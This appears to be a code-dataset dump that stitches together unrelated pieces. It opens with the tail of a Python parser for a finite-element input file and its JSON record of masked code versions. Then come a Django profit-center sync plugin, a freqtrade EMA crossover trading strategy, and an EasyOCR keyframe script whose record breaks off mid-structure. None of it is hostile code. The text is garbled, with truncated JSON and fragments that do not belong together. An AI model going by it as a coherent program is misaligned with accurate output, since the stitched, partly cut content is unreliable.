result[section]['materials'].append(material)
result['element_groups']['groups'][groupCounter].setMaterial(material)
groupCounter += 1
elif section == 'geometric_properties':
if geometricCounter == 0:
result[section]['count'] = el[0]
else:
result['element_groups']['groups'][geometricCounter - 1].setSectionArea(
el[0]
)
geometricCounter += 1
elif section == 'bcnodes':
if len(el) == 1:
result[section]['count'] = el[0]
else:
nodeIndex = next((e for e, item in enumerate(
result['coordinates']['nodes']) if item.n == int(el[0])), None
)
result['coordinates']['nodes'][nodeIndex].setRestriction(int(el[1]))
elif section == 'loads':
if len(el) == 1:
result[section]['count'] = el[0]
else:
load = Load(el[1], el[2])
nodeIndex = next((e for e, item in enumerate(
result['coordinates']['nodes']) if item.n == int(el[0])), None
)
result['coordinates']['nodes'][nodeIndex].addLoad(load)
for bar in result['bars']:
bar.createLocalArray()
print('---------- Parsing complete! ----------')
pprint(result)
print('---------------------------------------')
return result
# reader = Reader()
# reader.read("./arquivoentrada.fem")
|
flexible
|
{
"blob_id": "c796123fbbf3adcde59779a104dcafb30a673a79",
"index": 6422,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Reader:\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Reader:\n\n def read(self, filePath):\n \"\"\"\n Reads text file with nodes and returns the result dict with all objects\n and their nested properties\n \"\"\"\n result = {'coordinates': {'count': 0, 'nodes': []},\n 'element_groups': {'number_of_elements': 0, 'count': 0,\n 'groups': []}, 'bars': [], 'materials': {'count': 0,\n 'materials': []}, 'geometric_properties': {'count': 0},\n 'bcnodes': {'count': 0}, 'loads': {'count': 0}}\n with open(filePath, 'r') as f:\n lines = f.readlines()\n elementCounter = 0\n groupCounter = 0\n geometricCounter = 0\n for line in lines:\n line = line.strip()\n el = line.split(' ')\n if len(line) == 0:\n continue\n if len(line) != 0 and line[0] == '*':\n section = line[1:].lower()\n continue\n if section == 'coordinates':\n if len(el) == 1:\n result[section]['count'] = el[0]\n else:\n result[section]['nodes'].append(Node(int(el[0]),\n float(el[1]), float(el[2])))\n elif section == 'element_groups':\n if len(line) == 1:\n result[section]['count'] = int(el[0])\n else:\n result[section]['groups'].append(Group(el[0], el[1],\n el[2]))\n result[section]['number_of_elements'] += int(el[1])\n elif section == 'incidences':\n groups = result['element_groups']['groups']\n nodes = result['coordinates']['nodes']\n print(el)\n currentGroup = groups[groupCounter]\n if currentGroup.amount == 0:\n groupCounter += 1\n currentGroup = groups[groupCounter]\n print('Group n: {} count: {}'.format(currentGroup.n,\n currentGroup.amount))\n bar = Bar(el[0], nodes[int(el[1]) - 1], nodes[int(el[2]\n ) - 1], groups[groupCounter])\n print(\n \"\"\"\n Bar {} created \n Start node: {} End Node: {} Group: {}\n \"\"\"\n .format(bar.id, bar.startNode.n, bar.endNode.n, bar\n .group))\n result['bars'].append(bar)\n currentGroup.amount -= 1\n elif section == 'materials':\n if len(el) == 1:\n result[section]['count'] = el[0]\n groupCounter = 0\n else:\n material = Material(el[0], el[1], el[2])\n result[section]['materials'].append(material)\n result['element_groups']['groups'][groupCounter\n ].setMaterial(material)\n groupCounter += 1\n elif section == 'geometric_properties':\n if geometricCounter == 0:\n result[section]['count'] = el[0]\n else:\n result['element_groups']['groups'][geometricCounter - 1\n ].setSectionArea(el[0])\n geometricCounter += 1\n elif section == 'bcnodes':\n if len(el) == 1:\n result[section]['count'] = el[0]\n else:\n nodeIndex = next((e for e, item in enumerate(result\n ['coordinates']['nodes']) if item.n == int(el[0\n ])), None)\n result['coordinates']['nodes'][nodeIndex\n ].setRestriction(int(el[1]))\n elif section == 'loads':\n if len(el) == 1:\n result[section]['count'] = el[0]\n else:\n load = Load(el[1], el[2])\n nodeIndex = next((e for e, item in enumerate(result\n ['coordinates']['nodes']) if item.n == int(el[0\n ])), None)\n result['coordinates']['nodes'][nodeIndex].addLoad(load)\n for bar in result['bars']:\n bar.createLocalArray()\n print('---------- Parsing complete! ----------')\n pprint(result)\n print('---------------------------------------')\n return result\n",
"step-4": "from elements import Node, Bar, Material, Group, Load\nfrom pprint import pprint\n\n\nclass Reader:\n\n def read(self, filePath):\n \"\"\"\n Reads text file with nodes and returns the result dict with all objects\n and their nested properties\n \"\"\"\n result = {'coordinates': {'count': 0, 'nodes': []},\n 'element_groups': {'number_of_elements': 0, 'count': 0,\n 'groups': []}, 'bars': [], 'materials': {'count': 0,\n 'materials': []}, 'geometric_properties': {'count': 0},\n 'bcnodes': {'count': 0}, 'loads': {'count': 0}}\n with open(filePath, 'r') as f:\n lines = f.readlines()\n elementCounter = 0\n groupCounter = 0\n geometricCounter = 0\n for line in lines:\n line = line.strip()\n el = line.split(' ')\n if len(line) == 0:\n continue\n if len(line) != 0 and line[0] == '*':\n section = line[1:].lower()\n continue\n if section == 'coordinates':\n if len(el) == 1:\n result[section]['count'] = el[0]\n else:\n result[section]['nodes'].append(Node(int(el[0]),\n float(el[1]), float(el[2])))\n elif section == 'element_groups':\n if len(line) == 1:\n result[section]['count'] = int(el[0])\n else:\n result[section]['groups'].append(Group(el[0], el[1],\n el[2]))\n result[section]['number_of_elements'] += int(el[1])\n elif section == 'incidences':\n groups = result['element_groups']['groups']\n nodes = result['coordinates']['nodes']\n print(el)\n currentGroup = groups[groupCounter]\n if currentGroup.amount == 0:\n groupCounter += 1\n currentGroup = groups[groupCounter]\n print('Group n: {} count: {}'.format(currentGroup.n,\n currentGroup.amount))\n bar = Bar(el[0], nodes[int(el[1]) - 1], nodes[int(el[2]\n ) - 1], groups[groupCounter])\n print(\n \"\"\"\n Bar {} created \n Start node: {} End Node: {} Group: {}\n \"\"\"\n .format(bar.id, bar.startNode.n, bar.endNode.n, bar\n .group))\n result['bars'].append(bar)\n currentGroup.amount -= 1\n elif section == 'materials':\n if len(el) == 1:\n result[section]['count'] = el[0]\n groupCounter = 0\n else:\n material = Material(el[0], el[1], el[2])\n result[section]['materials'].append(material)\n result['element_groups']['groups'][groupCounter\n ].setMaterial(material)\n groupCounter += 1\n elif section == 'geometric_properties':\n if geometricCounter == 0:\n result[section]['count'] = el[0]\n else:\n result['element_groups']['groups'][geometricCounter - 1\n ].setSectionArea(el[0])\n geometricCounter += 1\n elif section == 'bcnodes':\n if len(el) == 1:\n result[section]['count'] = el[0]\n else:\n nodeIndex = next((e for e, item in enumerate(result\n ['coordinates']['nodes']) if item.n == int(el[0\n ])), None)\n result['coordinates']['nodes'][nodeIndex\n ].setRestriction(int(el[1]))\n elif section == 'loads':\n if len(el) == 1:\n result[section]['count'] = el[0]\n else:\n load = Load(el[1], el[2])\n nodeIndex = next((e for e, item in enumerate(result\n ['coordinates']['nodes']) if item.n == int(el[0\n ])), None)\n result['coordinates']['nodes'][nodeIndex].addLoad(load)\n for bar in result['bars']:\n bar.createLocalArray()\n print('---------- Parsing complete! ----------')\n pprint(result)\n print('---------------------------------------')\n return result\n",
"step-5": "from elements import Node, Bar, Material, Group, Load\nfrom pprint import pprint\n\n# query\n# next((e for e in result['coordinates']['nodes'] if e.n == int(el[0])), None)\n\nclass Reader():\n def read(self, filePath):\n \"\"\"\n Reads text file with nodes and returns the result dict with all objects\n and their nested properties\n \"\"\"\n \n result = {\n 'coordinates': {\n 'count': 0,\n 'nodes': []\n },\n 'element_groups': { \n 'number_of_elements': 0,\n 'count': 0,\n 'groups': []\n },\n 'bars': [],\n 'materials': {\n 'count': 0,\n 'materials': []\n },\n 'geometric_properties': {\n 'count': 0\n },\n 'bcnodes': {\n 'count': 0\n },\n 'loads': {\n 'count': 0\n }\n }\n # print(result['coordinates']['nodes'])\n \n with open(filePath,'r') as f:\n lines = f.readlines()\n elementCounter = 0\n groupCounter = 0\n geometricCounter = 0\n\n for line in lines:\n line = line.strip()\n el = line.split(' ')\n \n if len(line) == 0:\n continue\n\n if len(line) != 0 and line[0] == \"*\":\n section = line[1:].lower()\n continue\n \n if section == 'coordinates':\n if len(el) == 1 :\n result[section]['count'] = el[0]\n else:\n result[section]['nodes'].append(Node(int(el[0]), float(el[1]), float(el[2])))\n \n elif section == 'element_groups':\n if len(line) == 1:\n result[section]['count'] = int(el[0])\n else: \n result[section]['groups'].append(Group(el[0], el[1], el[2]))\n result[section]['number_of_elements'] += int(el[1])\n\n elif section == 'incidences':\n groups = result['element_groups']['groups']\n nodes = result['coordinates']['nodes']\n print(el)\n\n currentGroup = groups[groupCounter]\n if (currentGroup.amount == 0):\n groupCounter += 1\n currentGroup = groups[groupCounter]\n \n print(\"Group n: {} count: {}\".format(currentGroup.n, currentGroup.amount))\n \n bar = Bar(el[0], nodes[int(el[1])-1], nodes[int(el[2])-1], groups[groupCounter])\n print(\n \"\"\"\n Bar {} created \n Start node: {} End Node: {} Group: {}\n \"\"\".format(bar.id, bar.startNode.n, bar.endNode.n, bar.group))\n result['bars'].append(bar)\n currentGroup.amount -= 1\n \n elif section == 'materials':\n if len(el) == 1:\n result[section]['count'] = el[0]\n groupCounter = 0\n else:\n material = Material(el[0], el[1], el[2])\n result[section]['materials'].append(material)\n result['element_groups']['groups'][groupCounter].setMaterial(material)\n groupCounter += 1\n\n elif section == 'geometric_properties':\n if geometricCounter == 0:\n result[section]['count'] = el[0]\n else:\n result['element_groups']['groups'][geometricCounter - 1].setSectionArea(\n el[0]\n )\n geometricCounter += 1\n\n elif section == 'bcnodes':\n if len(el) == 1:\n result[section]['count'] = el[0]\n else:\n nodeIndex = next((e for e, item in enumerate(\n result['coordinates']['nodes']) if item.n == int(el[0])), None\n )\n result['coordinates']['nodes'][nodeIndex].setRestriction(int(el[1]))\n\n elif section == 'loads':\n if len(el) == 1:\n result[section]['count'] = el[0]\n else:\n load = Load(el[1], el[2])\n nodeIndex = next((e for e, item in enumerate(\n result['coordinates']['nodes']) if item.n == int(el[0])), None\n )\n result['coordinates']['nodes'][nodeIndex].addLoad(load)\n\n for bar in result['bars']:\n bar.createLocalArray()\n\n print('---------- Parsing complete! ----------')\n pprint(result)\n print('---------------------------------------')\n\n return result\n \n\n# reader = Reader()\n# reader.read(\"./arquivoentrada.fem\")\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
from django.db import transaction
from ralph_scrooge.models import ProfitCenter
from ralph_scrooge.plugins import plugin_runner
from ralph_scrooge.plugins.collect.utils import get_from_ralph
logger = logging.getLogger(__name__)
@transaction.atomic
def update_profit_center(pc):
profit_center, created = ProfitCenter.objects.get_or_create(
ralph3_id=pc['id'],
defaults=dict(
name=pc['name'],
)
)
profit_center.name = pc['name']
profit_center.description = pc['description']
profit_center.save()
return created
@plugin_runner.register(chain='scrooge')
def ralph3_profit_center(**kwargs):
new_pc = total = 0
for pc in get_from_ralph("profit-centers", logger):
created = update_profit_center(pc)
if created:
new_pc += 1
total += 1
return True, '{} new profit center(s), {} updated, {} total'.format(
new_pc,
total - new_pc,
total,
)
|
normal
|
{
"blob_id": "d3f52d4713ba4b7b4cd736b26809968e259be63c",
"index": 6883,
"step-1": "<mask token>\n\n\n@plugin_runner.register(chain='scrooge')\ndef ralph3_profit_center(**kwargs):\n new_pc = total = 0\n for pc in get_from_ralph('profit-centers', logger):\n created = update_profit_center(pc)\n if created:\n new_pc += 1\n total += 1\n return True, '{} new profit center(s), {} updated, {} total'.format(new_pc,\n total - new_pc, total)\n",
"step-2": "<mask token>\n\n\[email protected]\ndef update_profit_center(pc):\n profit_center, created = ProfitCenter.objects.get_or_create(ralph3_id=\n pc['id'], defaults=dict(name=pc['name']))\n profit_center.name = pc['name']\n profit_center.description = pc['description']\n profit_center.save()\n return created\n\n\n@plugin_runner.register(chain='scrooge')\ndef ralph3_profit_center(**kwargs):\n new_pc = total = 0\n for pc in get_from_ralph('profit-centers', logger):\n created = update_profit_center(pc)\n if created:\n new_pc += 1\n total += 1\n return True, '{} new profit center(s), {} updated, {} total'.format(new_pc,\n total - new_pc, total)\n",
"step-3": "<mask token>\nlogger = logging.getLogger(__name__)\n\n\[email protected]\ndef update_profit_center(pc):\n profit_center, created = ProfitCenter.objects.get_or_create(ralph3_id=\n pc['id'], defaults=dict(name=pc['name']))\n profit_center.name = pc['name']\n profit_center.description = pc['description']\n profit_center.save()\n return created\n\n\n@plugin_runner.register(chain='scrooge')\ndef ralph3_profit_center(**kwargs):\n new_pc = total = 0\n for pc in get_from_ralph('profit-centers', logger):\n created = update_profit_center(pc)\n if created:\n new_pc += 1\n total += 1\n return True, '{} new profit center(s), {} updated, {} total'.format(new_pc,\n total - new_pc, total)\n",
"step-4": "from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\nimport logging\nfrom django.db import transaction\nfrom ralph_scrooge.models import ProfitCenter\nfrom ralph_scrooge.plugins import plugin_runner\nfrom ralph_scrooge.plugins.collect.utils import get_from_ralph\nlogger = logging.getLogger(__name__)\n\n\[email protected]\ndef update_profit_center(pc):\n profit_center, created = ProfitCenter.objects.get_or_create(ralph3_id=\n pc['id'], defaults=dict(name=pc['name']))\n profit_center.name = pc['name']\n profit_center.description = pc['description']\n profit_center.save()\n return created\n\n\n@plugin_runner.register(chain='scrooge')\ndef ralph3_profit_center(**kwargs):\n new_pc = total = 0\n for pc in get_from_ralph('profit-centers', logger):\n created = update_profit_center(pc)\n if created:\n new_pc += 1\n total += 1\n return True, '{} new profit center(s), {} updated, {} total'.format(new_pc,\n total - new_pc, total)\n",
"step-5": "# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport logging\n\nfrom django.db import transaction\n\nfrom ralph_scrooge.models import ProfitCenter\nfrom ralph_scrooge.plugins import plugin_runner\nfrom ralph_scrooge.plugins.collect.utils import get_from_ralph\n\n\nlogger = logging.getLogger(__name__)\n\n\[email protected]\ndef update_profit_center(pc):\n profit_center, created = ProfitCenter.objects.get_or_create(\n ralph3_id=pc['id'],\n defaults=dict(\n name=pc['name'],\n )\n )\n profit_center.name = pc['name']\n profit_center.description = pc['description']\n profit_center.save()\n return created\n\n\n@plugin_runner.register(chain='scrooge')\ndef ralph3_profit_center(**kwargs):\n new_pc = total = 0\n for pc in get_from_ralph(\"profit-centers\", logger):\n created = update_profit_center(pc)\n if created:\n new_pc += 1\n total += 1\n return True, '{} new profit center(s), {} updated, {} total'.format(\n new_pc,\n total - new_pc,\n total,\n )\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# --- Do not remove these libs ---
from freqtrade.strategy.interface import IStrategy
from typing import Dict, List
from functools import reduce
from pandas import DataFrame
# --------------------------------
import datetime
import talib.abstract as ta
import freqtrade.vendor.qtpylib.indicators as qtpylib
import numpy as np# noqa
class ema(IStrategy):
max_open_trades = 10
stake_amount = 50
# Minimal ROI designed for the strategy.
# This attribute will be overridden if the config file contains "minimal_roi"
# Optimal stoploss designed for the strategy
# This attribute will be overridden if the config file contains "stoploss"
stoploss = -1
minimal_roi = {
"0": 10
}
# Optimal timeframe for the strategy
timeframe = '5m'
# trailing stoploss
trailing_stop = False
trailing_stop_positive = 0.1
trailing_stop_positive_offset = 0.2
# run "populate_indicators" only for new candle
process_only_new_candles = False
# Experimental settings (configuration will overide these if set)
use_sell_signal = True
sell_profit_only = False
ignore_roi_if_buy_signal = False
# Optional order type mapping
order_types = {
'buy': 'limit',
'sell': 'limit',
'stoploss': 'market',
'stoploss_on_exchange': False
}
def populate_indicators(self, dataframe: DataFrame, metadata: dict) -> DataFrame:
"""
Adds several different TA indicators to the given DataFrame
Performance Note: For the best performance be frugal on the number of indicators
you are using. Let uncomment only the indicator you are using in your strategies
or your hyperopt configuration, otherwise you will waste your memory and CPU usage.
"""
dataframe['ema6'] = ta.EMA(dataframe, timeperiod=9)
dataframe['ema24'] = ta.EMA(dataframe, timeperiod=18)
dataframe['ema11'] = ta.EMA(dataframe, timeperiod=32)
dataframe['ema25'] = ta.EMA(dataframe, timeperiod=64)
dataframe['ema'] =dataframe['ema6']-dataframe['ema24']
dataframe['ema2'] = dataframe['ema11'] - dataframe['ema25']
dataframe['ema']= dataframe['ema']*0.6 + dataframe['ema2']*0.5
dataframe['ema2'] = ta.SMA(dataframe['ema'], timeperiod=29)
return dataframe
def populate_buy_trend(self, dataframe: DataFrame, metadata: dict) -> DataFrame:
"""
Based on TA indicators, populates the buy signal for the given dataframe
:param dataframe: DataFrame
:return: DataFrame with buy column
"""
dataframe.loc[
(
(qtpylib.crossed_above(dataframe['ema'],dataframe['ema2']))
),'buy'] = 1
return dataframe
def populate_sell_trend(self, dataframe: DataFrame, metadata: dict) -> DataFrame:
"""
Based on TA indicators, populates the sell signal for the given dataframe
:param dataframe: DataFrame
:return: DataFrame with buy column
"""
dataframe.loc[(qtpylib.crossed_below(dataframe['ema'], dataframe['ema2'])),'sell'] = 1
return dataframe
|
normal
|
{
"blob_id": "7b047ba110732d1b0a749bcbbaa9b55306ca2071",
"index": 6434,
"step-1": "<mask token>\n\n\nclass ema(IStrategy):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def populate_sell_trend(self, dataframe: DataFrame, metadata: dict\n ) ->DataFrame:\n \"\"\"\n Based on TA indicators, populates the sell signal for the given dataframe\n :param dataframe: DataFrame\n :return: DataFrame with buy column\n \"\"\"\n dataframe.loc[qtpylib.crossed_below(dataframe['ema'], dataframe[\n 'ema2']), 'sell'] = 1\n return dataframe\n",
"step-2": "<mask token>\n\n\nclass ema(IStrategy):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def populate_indicators(self, dataframe: DataFrame, metadata: dict\n ) ->DataFrame:\n \"\"\"\n Adds several different TA indicators to the given DataFrame\n Performance Note: For the best performance be frugal on the number of indicators\n you are using. Let uncomment only the indicator you are using in your strategies\n or your hyperopt configuration, otherwise you will waste your memory and CPU usage.\n \"\"\"\n dataframe['ema6'] = ta.EMA(dataframe, timeperiod=9)\n dataframe['ema24'] = ta.EMA(dataframe, timeperiod=18)\n dataframe['ema11'] = ta.EMA(dataframe, timeperiod=32)\n dataframe['ema25'] = ta.EMA(dataframe, timeperiod=64)\n dataframe['ema'] = dataframe['ema6'] - dataframe['ema24']\n dataframe['ema2'] = dataframe['ema11'] - dataframe['ema25']\n dataframe['ema'] = dataframe['ema'] * 0.6 + dataframe['ema2'] * 0.5\n dataframe['ema2'] = ta.SMA(dataframe['ema'], timeperiod=29)\n return dataframe\n\n def populate_buy_trend(self, dataframe: DataFrame, metadata: dict\n ) ->DataFrame:\n \"\"\"\n Based on TA indicators, populates the buy signal for the given dataframe\n :param dataframe: DataFrame\n :return: DataFrame with buy column\n \"\"\"\n dataframe.loc[qtpylib.crossed_above(dataframe['ema'], dataframe[\n 'ema2']), 'buy'] = 1\n return dataframe\n\n def populate_sell_trend(self, dataframe: DataFrame, metadata: dict\n ) ->DataFrame:\n \"\"\"\n Based on TA indicators, populates the sell signal for the given dataframe\n :param dataframe: DataFrame\n :return: DataFrame with buy column\n \"\"\"\n dataframe.loc[qtpylib.crossed_below(dataframe['ema'], dataframe[\n 'ema2']), 'sell'] = 1\n return dataframe\n",
"step-3": "<mask token>\n\n\nclass ema(IStrategy):\n max_open_trades = 10\n stake_amount = 50\n stoploss = -1\n minimal_roi = {'0': 10}\n timeframe = '5m'\n trailing_stop = False\n trailing_stop_positive = 0.1\n trailing_stop_positive_offset = 0.2\n process_only_new_candles = False\n use_sell_signal = True\n sell_profit_only = False\n ignore_roi_if_buy_signal = False\n order_types = {'buy': 'limit', 'sell': 'limit', 'stoploss': 'market',\n 'stoploss_on_exchange': False}\n\n def populate_indicators(self, dataframe: DataFrame, metadata: dict\n ) ->DataFrame:\n \"\"\"\n Adds several different TA indicators to the given DataFrame\n Performance Note: For the best performance be frugal on the number of indicators\n you are using. Let uncomment only the indicator you are using in your strategies\n or your hyperopt configuration, otherwise you will waste your memory and CPU usage.\n \"\"\"\n dataframe['ema6'] = ta.EMA(dataframe, timeperiod=9)\n dataframe['ema24'] = ta.EMA(dataframe, timeperiod=18)\n dataframe['ema11'] = ta.EMA(dataframe, timeperiod=32)\n dataframe['ema25'] = ta.EMA(dataframe, timeperiod=64)\n dataframe['ema'] = dataframe['ema6'] - dataframe['ema24']\n dataframe['ema2'] = dataframe['ema11'] - dataframe['ema25']\n dataframe['ema'] = dataframe['ema'] * 0.6 + dataframe['ema2'] * 0.5\n dataframe['ema2'] = ta.SMA(dataframe['ema'], timeperiod=29)\n return dataframe\n\n def populate_buy_trend(self, dataframe: DataFrame, metadata: dict\n ) ->DataFrame:\n \"\"\"\n Based on TA indicators, populates the buy signal for the given dataframe\n :param dataframe: DataFrame\n :return: DataFrame with buy column\n \"\"\"\n dataframe.loc[qtpylib.crossed_above(dataframe['ema'], dataframe[\n 'ema2']), 'buy'] = 1\n return dataframe\n\n def populate_sell_trend(self, dataframe: DataFrame, metadata: dict\n ) ->DataFrame:\n \"\"\"\n Based on TA indicators, populates the sell signal for the given dataframe\n :param dataframe: DataFrame\n :return: DataFrame with buy column\n \"\"\"\n dataframe.loc[qtpylib.crossed_below(dataframe['ema'], dataframe[\n 'ema2']), 'sell'] = 1\n return dataframe\n",
"step-4": "from freqtrade.strategy.interface import IStrategy\nfrom typing import Dict, List\nfrom functools import reduce\nfrom pandas import DataFrame\nimport datetime\nimport talib.abstract as ta\nimport freqtrade.vendor.qtpylib.indicators as qtpylib\nimport numpy as np\n\n\nclass ema(IStrategy):\n max_open_trades = 10\n stake_amount = 50\n stoploss = -1\n minimal_roi = {'0': 10}\n timeframe = '5m'\n trailing_stop = False\n trailing_stop_positive = 0.1\n trailing_stop_positive_offset = 0.2\n process_only_new_candles = False\n use_sell_signal = True\n sell_profit_only = False\n ignore_roi_if_buy_signal = False\n order_types = {'buy': 'limit', 'sell': 'limit', 'stoploss': 'market',\n 'stoploss_on_exchange': False}\n\n def populate_indicators(self, dataframe: DataFrame, metadata: dict\n ) ->DataFrame:\n \"\"\"\n Adds several different TA indicators to the given DataFrame\n Performance Note: For the best performance be frugal on the number of indicators\n you are using. Let uncomment only the indicator you are using in your strategies\n or your hyperopt configuration, otherwise you will waste your memory and CPU usage.\n \"\"\"\n dataframe['ema6'] = ta.EMA(dataframe, timeperiod=9)\n dataframe['ema24'] = ta.EMA(dataframe, timeperiod=18)\n dataframe['ema11'] = ta.EMA(dataframe, timeperiod=32)\n dataframe['ema25'] = ta.EMA(dataframe, timeperiod=64)\n dataframe['ema'] = dataframe['ema6'] - dataframe['ema24']\n dataframe['ema2'] = dataframe['ema11'] - dataframe['ema25']\n dataframe['ema'] = dataframe['ema'] * 0.6 + dataframe['ema2'] * 0.5\n dataframe['ema2'] = ta.SMA(dataframe['ema'], timeperiod=29)\n return dataframe\n\n def populate_buy_trend(self, dataframe: DataFrame, metadata: dict\n ) ->DataFrame:\n \"\"\"\n Based on TA indicators, populates the buy signal for the given dataframe\n :param dataframe: DataFrame\n :return: DataFrame with buy column\n \"\"\"\n dataframe.loc[qtpylib.crossed_above(dataframe['ema'], dataframe[\n 'ema2']), 'buy'] = 1\n return dataframe\n\n def populate_sell_trend(self, dataframe: DataFrame, metadata: dict\n ) ->DataFrame:\n \"\"\"\n Based on TA indicators, populates the sell signal for the given dataframe\n :param dataframe: DataFrame\n :return: DataFrame with buy column\n \"\"\"\n dataframe.loc[qtpylib.crossed_below(dataframe['ema'], dataframe[\n 'ema2']), 'sell'] = 1\n return dataframe\n",
"step-5": "# --- Do not remove these libs ---\nfrom freqtrade.strategy.interface import IStrategy\nfrom typing import Dict, List\nfrom functools import reduce\nfrom pandas import DataFrame\n# --------------------------------\n\nimport datetime\nimport talib.abstract as ta\nimport freqtrade.vendor.qtpylib.indicators as qtpylib\nimport numpy as np# noqa\n\n\nclass ema(IStrategy):\n\n max_open_trades = 10\n stake_amount = 50\n # Minimal ROI designed for the strategy.\n # This attribute will be overridden if the config file contains \"minimal_roi\"\n\n # Optimal stoploss designed for the strategy\n # This attribute will be overridden if the config file contains \"stoploss\"\n stoploss = -1\n\n minimal_roi = {\n \"0\": 10\n }\n\n # Optimal timeframe for the strategy\n timeframe = '5m'\n\n # trailing stoploss\n trailing_stop = False\n trailing_stop_positive = 0.1\n trailing_stop_positive_offset = 0.2\n\n # run \"populate_indicators\" only for new candle\n process_only_new_candles = False\n\n # Experimental settings (configuration will overide these if set)\n use_sell_signal = True\n sell_profit_only = False\n ignore_roi_if_buy_signal = False\n\n # Optional order type mapping\n order_types = {\n 'buy': 'limit',\n 'sell': 'limit',\n 'stoploss': 'market',\n 'stoploss_on_exchange': False\n }\n\n def populate_indicators(self, dataframe: DataFrame, metadata: dict) -> DataFrame:\n \"\"\"\n Adds several different TA indicators to the given DataFrame\n Performance Note: For the best performance be frugal on the number of indicators\n you are using. Let uncomment only the indicator you are using in your strategies\n or your hyperopt configuration, otherwise you will waste your memory and CPU usage.\n \"\"\"\n\n dataframe['ema6'] = ta.EMA(dataframe, timeperiod=9)\n dataframe['ema24'] = ta.EMA(dataframe, timeperiod=18)\n\n dataframe['ema11'] = ta.EMA(dataframe, timeperiod=32)\n dataframe['ema25'] = ta.EMA(dataframe, timeperiod=64)\n\n dataframe['ema'] =dataframe['ema6']-dataframe['ema24']\n dataframe['ema2'] = dataframe['ema11'] - dataframe['ema25']\n\n dataframe['ema']= dataframe['ema']*0.6 + dataframe['ema2']*0.5\n dataframe['ema2'] = ta.SMA(dataframe['ema'], timeperiod=29)\n\n return dataframe\n\n def populate_buy_trend(self, dataframe: DataFrame, metadata: dict) -> DataFrame:\n \"\"\"\n Based on TA indicators, populates the buy signal for the given dataframe\n :param dataframe: DataFrame\n :return: DataFrame with buy column\n \"\"\"\n\n dataframe.loc[\n (\n (qtpylib.crossed_above(dataframe['ema'],dataframe['ema2']))\n ),'buy'] = 1\n\n return dataframe\n\n def populate_sell_trend(self, dataframe: DataFrame, metadata: dict) -> DataFrame:\n \"\"\"\n Based on TA indicators, populates the sell signal for the given dataframe\n :param dataframe: DataFrame\n :return: DataFrame with buy column\n \"\"\"\n dataframe.loc[(qtpylib.crossed_below(dataframe['ema'], dataframe['ema2'])),'sell'] = 1\n\n return dataframe",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
import easyocr
import cv2
import json
import numpy as np
import os
import os.path
import glob
def convert(o):
if isinstance(o, np.generic): return o.item()
raise TypeError
readers = [
easyocr.Reader(['la', 'en', 'de', 'fr', 'es', 'cs', 'is'], gpu = False),
#easyocr.Reader(['ch_tra'], gpu = False),
#easyocr.Reader(['fa'], gpu = False),
#easyocr.Reader(['hi'], gpu = False),
#easyocr.Reader(['ja'], gpu = False),
#easyocr.Reader(['ko'], gpu = False),
#easyocr.Reader(['th'], gpu = False),
]
basedir = "keyframes/"
dirs = os.listdir(basedir)
for d in dirs:
outfile = 'ocr/' + d + '.json'
if os.path.isfile(outfile):
print("found " + outfile + ", skipping")
continue
files = glob.glob(basedir + d + "/*.png")
ocr = {}
for f in files:
i = f.split("_")[-2]
img = cv2.imread(f)
results = []
for reader in readers:
results = results + reader.readtext(img)
h = list(filter(lambda result : len(result) > 2 and len(result[1]) > 0 and result[2] >= 0.1, results))
if len(h) > 0:
ocr[i] = h
with open(outfile,'w') as f:
json.dump(ocr, f, indent=1, default=convert)
print(d)
|
normal
|
{
"blob_id": "7057b882ca1ce2c08e9ba7add5f115636b9b319e",
"index": 8745,
"step-1": "<mask token>\n\n\ndef convert(o):\n if isinstance(o, np.generic):\n return o.item()\n raise TypeError\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef convert(o):\n if isinstance(o, np.generic):\n return o.item()\n raise TypeError\n\n\n<mask token>\nfor d in dirs:\n outfile = 'ocr/' + d + '.json'\n if os.path.isfile(outfile):\n print('found ' + outfile + ', skipping')\n continue\n files = glob.glob(basedir + d + '/*.png')\n ocr = {}\n for f in files:\n i = f.split('_')[-2]\n img = cv2.imread(f)\n results = []\n for reader in readers:\n results = results + reader.readtext(img)\n h = list(filter(lambda result: len(result) > 2 and len(result[1]) >\n 0 and result[2] >= 0.1, results))\n if len(h) > 0:\n ocr[i] = h\n with open(outfile, 'w') as f:\n json.dump(ocr, f, indent=1, default=convert)\n print(d)\n",
"step-3": "<mask token>\n\n\ndef convert(o):\n if isinstance(o, np.generic):\n return o.item()\n raise TypeError\n\n\nreaders = [easyocr.Reader(['la', 'en', 'de', 'fr', 'es', 'cs', 'is'], gpu=\n False)]\nbasedir = 'keyframes/'\ndirs = os.listdir(basedir)\nfor d in dirs:\n outfile = 'ocr/' + d + '.json'\n if os.path.isfile(outfile):\n print('found ' + outfile + ', skipping')\n continue\n files = glob.glob(basedir + d + '/*.png')\n ocr = {}\n for f in files:\n i = f.split('_')[-2]\n img = cv2.imread(f)\n results = []\n for reader in readers:\n results = results + reader.readtext(img)\n h = list(filter(lambda result: len(result) > 2 and len(result[1]) >\n 0 and result[2] >= 0.1, results))\n if len(h) > 0:\n ocr[i] = h\n with open(outfile, 'w') as f:\n json.dump(ocr, f, indent=1, default=convert)\n print(d)\n",
